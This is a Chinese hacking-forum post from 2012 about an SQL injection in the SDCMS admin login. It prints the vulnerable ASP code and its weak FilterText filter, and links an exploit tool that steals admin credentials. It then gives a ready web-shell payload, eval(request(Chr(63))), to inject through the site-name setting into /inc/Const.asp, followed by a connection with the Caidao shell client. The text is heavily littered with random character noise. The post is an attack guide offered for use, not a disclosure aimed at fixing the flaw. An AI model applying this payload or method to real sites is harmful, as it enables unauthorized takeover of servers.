作者:T00LS 鬼哥
, T( ]5 @6 y s" q5 t7 I' n漏洞文件:后台目录/index.asp/ r, c: d5 e: {2 q' F5 K
2 P# k" `# _; J zSub Check3 P# S8 e9 \7 Z2 j+ X [3 z C
Dim username,password,code,getcode,Rs* M. M9 f* U2 `' y5 ?
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub: q1 r2 v7 R* [7 v& P% B
username=FilterText(Trim(Request.Form("username")),1)
8 C. z5 I+ x* e# B/ ~: k7 C ~- n password=FilterText(Trim(Request.Form("password")),1)% m2 g! v; T( c4 B% r. K
code=Trim(Request.Form("yzm"))
; t/ z! b3 X! F" f* a" I getcode=Session("SDCMSCode")' S3 ?9 ]: v& v
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
' g' I1 M6 l4 t' G8 a6 a- z2 m IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
3 {, w; S0 I6 g; b IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
& {, f; s: Y% j2 g! U: o IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
' u- N+ k D O5 ~% q8 s IF username="" or password="" Then' {; h- C0 W* R9 D
Echo "用户名或密码不能为空"ied
/ R/ c. c8 v3 t Else
' T5 [7 {- z! I Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'"). B4 o# O N- c9 g
IF Rs.Eof Then
' B2 q7 @6 a$ {+ ^/ Z AddLog username,GetIp,"登录失败",1
, g: d: W8 ]7 e. O- j _( y Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
. F: z, l) C2 o8 A5 R4 A Else
: j# {1 \$ T; m% j) x3 v Add_Cookies "sdcms_id",Rs(0)
3 t+ @9 z0 R P7 L2 d Add_Cookies "sdcms_name",username1 {. R" S0 B' ~. s! A( O
Add_Cookies "sdcms_pwd",Rs(2)
7 `5 C4 s" F1 R x, d- q( A f6 \ Add_Cookies "sdcms_admin",Rs(3)3 j6 \2 A+ o# J& O; q- T
Add_Cookies "sdcms_alllever",Rs(4)
3 V5 x9 ?( A% L2 G" E Add_Cookies "sdcms_infolever",Rs(5)/ ?+ `) n8 n @1 v3 Q+ U# p
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&""): K8 N" j* }( n5 j2 S) W( V) q3 @/ J
AddLog username,GetIp,"登录成功",1
. e5 b. T9 |" g; c" O5 W6 A: q '自动删除30天前的Log记录
2 R" S0 z: G0 p1 ]7 \1 ^' O% m IF Sdcms_DataType Then6 d7 y, a* n% w2 F, c
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")# g$ F; ^" [% g& x6 ]
Else
+ ?; o" s2 x: l Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")& B2 a4 @# I! P
End IF) Q: t7 g5 m$ l3 x4 W' C
Go("sdcms_index.asp")9 D& U8 M h6 v5 Y2 A: o
End IF
4 ]$ V; g% n7 I L8 x Rs.Close
1 w: w l4 Z4 \5 k; z m Set Rs=Nothing6 X$ V" b4 A1 z
End IF% V5 N- I7 B& x( Z5 ?# t8 U
End Sub Q- s7 V) h7 J0 B
+ v; [. ` Z2 ^4 o9 F" i5 ^. c
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码' J9 b% w- R: C# n
+ b& g9 c$ {6 q5 S9 J4 b1 SFunction FilterText(ByVal t0,ByVal t1)
! p+ X2 s. Z5 i' R$ u/ A* Y# ~2 w1 p IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
* J- a( a% s0 `5 j t0=Trim(t0)/ w9 P! q: N0 M' N; a# O" ^) j" O
Select Case t1
& R( S% ^% I# w Case "1"
3 P* Q9 n3 e5 I2 u6 v t0=Replace(t0,Chr(32),"")1 H# E5 w! c7 X4 Y2 N* ^
t0=Replace(t0,Chr(13),"")
5 O& V) r; n; e4 K/ x/ T. I t0=Replace(t0,Chr(10)&Chr(10),"")
$ W7 u5 h/ L! i" w t0=Replace(t0,Chr(10),"")
' s3 B, t I" e0 a* T Case "2" k8 ]8 D |8 _# n# I5 k7 d
t0=Replace(t0,Chr(8),"")'回格
9 e- K( {2 `3 `% t8 A t0=Replace(t0,Chr(9),"")'tab(水平制表符). ^' Y$ A! k" O
t0=Replace(t0,Chr(10),"")'换行; a: ]* R9 e. b! o+ d$ ?
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)0 P! a1 c& ?( S) F% C# w2 {2 b- Q$ v- ]
t0=Replace(t0,Chr(12),"")'换页
& o, I% p) t7 ` t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合% [' O# x4 b$ D* V
t0=Replace(t0,Chr(22),"")
7 s4 ?* N8 F: O- Y1 M) x2 ?, O2 n t0=Replace(t0,Chr(32),"")'空格 SPACE9 s. G0 W1 U& J% p
t0=Replace(t0,Chr(33),"")'!1 G9 j8 ?/ m* g3 l
t0=Replace(t0,Chr(34),"")'"
; {7 `% [# `6 b7 \ t0=Replace(t0,Chr(35),"")'#
2 J6 m; m2 r, g t0=Replace(t0,Chr(36),"")'$! L" D( g4 A1 W. _
t0=Replace(t0,Chr(37),"")'%
, f# i, w7 M& W( X& n t0=Replace(t0,Chr(38),"")'&% ~( |! i! J, |5 J8 c
t0=Replace(t0,Chr(39),"")''4 o8 w- j, l `6 a' I
t0=Replace(t0,Chr(40),"")'(
/ x, j z0 o" i" g t0=Replace(t0,Chr(41),"")')& |8 q8 f: X; e) D
t0=Replace(t0,Chr(42),"")'*0 ~' D8 c/ {+ }: W3 U" r2 c
t0=Replace(t0,Chr(43),"")'+
( c5 Q& y9 q8 X% C4 h5 d t0=Replace(t0,Chr(44),"")',
$ x) K8 K! @. |% P t0=Replace(t0,Chr(45),"")'-+ @! {) Q% H7 A: `) B
t0=Replace(t0,Chr(46),"")'.
) R; q3 `3 H: A' P( x O$ D t0=Replace(t0,Chr(47),"")'/
. W6 c+ c# O& N6 M+ V t0=Replace(t0,Chr(58),"")':: s* J+ d, s) j# m; K5 E
t0=Replace(t0,Chr(59),"")';; ?0 e) H4 x. r. d8 u
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
f3 x5 J2 e6 ?4 t t0=Replace(t0,Chr(63),"")'?
0 j- k6 E* r' P$ }. s' j& K t0=Replace(t0,Chr(64),"")'@6 e7 Z: s1 d, @ I4 N5 F3 B
t0=Replace(t0,Chr(91),"")'\+ o. K" v* f4 @( ]# j( r1 E
t0=Replace(t0,Chr(92),"")'\) g9 Q+ q' D- }2 p6 N
t0=Replace(t0,Chr(93),"")']
/ e0 c0 @6 g; L8 x" v; l+ D t0=Replace(t0,Chr(94),"")'^
/ }9 e5 h8 \/ f t0=Replace(t0,Chr(95),"")'_! l: c5 v5 i, @1 e9 O8 @/ |" ]4 J
t0=Replace(t0,Chr(96),"")'`! v9 d: q' e* Y F% z# X/ {0 X* c
t0=Replace(t0,Chr(123),"")'{& g; l x! V2 ~1 H+ h
t0=Replace(t0,Chr(124),"")'|$ |7 ^8 e! W' y; N$ K- r- E
t0=Replace(t0,Chr(125),"")'}* G+ x8 m+ y2 V3 F4 d
t0=Replace(t0,Chr(126),"")'~* r9 X) y, i3 N5 }, v3 e+ U
Case Else$ S6 m1 W0 f0 [" T$ }9 V
t0=Replace(t0, "&", "&")
! y3 a+ e; q/ |/ e t0=Replace(t0, "'", "'")
) P* X4 m* E2 E$ P: j! E t0=Replace(t0, """", """)" _) }/ x# L1 \# \
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
. ], j5 k0 B7 L- e End Select
, }- K" `5 ^5 ^. Z IF Instr(Lcase(t0),"expression")>0 Then
) N0 |* u: {( z4 E7 g* f& V t0=Replace(t0,"expression","e­xpression", 1, -1, 0), x* m( |& ?1 ?$ }8 x
End If
$ W) ~- b2 b9 V9 b FilterText=t05 [7 }" S1 U. p }
End Function
+ O/ v5 g, O3 F2 E% o7 Y" {0 Y; `. {; h
看到没。直接参数是1 只过滤
" s. Q7 [5 L" j5 P' V t0=Replace(t0,Chr(32)," ")
* _9 r# e5 S3 F t0=Replace(t0,Chr(13),"")
s4 X, C6 h) O- w t0=Replace(t0,Chr(10)&Chr(10),"
7 H$ ~8 c5 n! G3 `! l")/ W- d' C/ m7 p; A
t0=Replace(t0,Chr(10),"
& Y! U) u6 \( b+ ^( f. y" n# W")
; O. [0 v! E3 E漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!" x. ^3 ~& _& {; u; ?
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
6 l9 M4 z$ t# l q, k( q# [- [5 ]0 v: G# F( C n- t
测试:6 V; f2 v: ~" Q5 c
* R. u, S, Y: ^% X5 \
# O- c- |3 m) ~" E T3 [$ ?0 d: `现在输入工具上验证码,然后点OK+ N- i* y: ~6 ~
/ x, |1 }6 r# R& B# \" H1 Q$ r( E5 ?& a" Q+ g
看到我们直接进入后台管理界面了,呵呵!# ^. a& h5 Z( B" G9 F' R
, \7 }% ?: |' v2 k( G5 r6 M) o9 x+ i/ k/ i" b v' V
) r7 {2 F3 ?/ z4 J- {& S3 U2 {
这样直接进入后台了。。。。
8 N% |2 o0 u4 q$ H" Y- h, v# b+ Y8 E6 n/ s/ t9 U! ~: R! l
[& R* C- D+ t& Z8 i7 p) L/ M$ [* l, A# Z2 E: k1 M" w# K5 q' h, d) d& V
SDCMS提权:2 n4 x; e& i0 R) x {9 F9 L
( N0 i+ B- X+ ?8 h* V4 s1 |方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?. r: B% _( l- T4 [3 {
9 T8 H7 {& e+ h5 z8 V% a
! F8 l; k$ V* X v( q& |+ h* I; m
OK,现在用菜刀连接下!8 O! L' O: ]' B+ q
2 K; @$ ~/ {5 }! M& K: ~" ?% O# ^+ X6 O9 {2 g% S" O' e1 q1 ]
9 ]3 r7 ] s. {1 e1 w - ^0 A" a7 L; I! y5 F# Q" I
% G: E( y" K! m- \" p8 M. }
|
发表于 2012-11-9 20:57:02
收藏
分享
支持
反对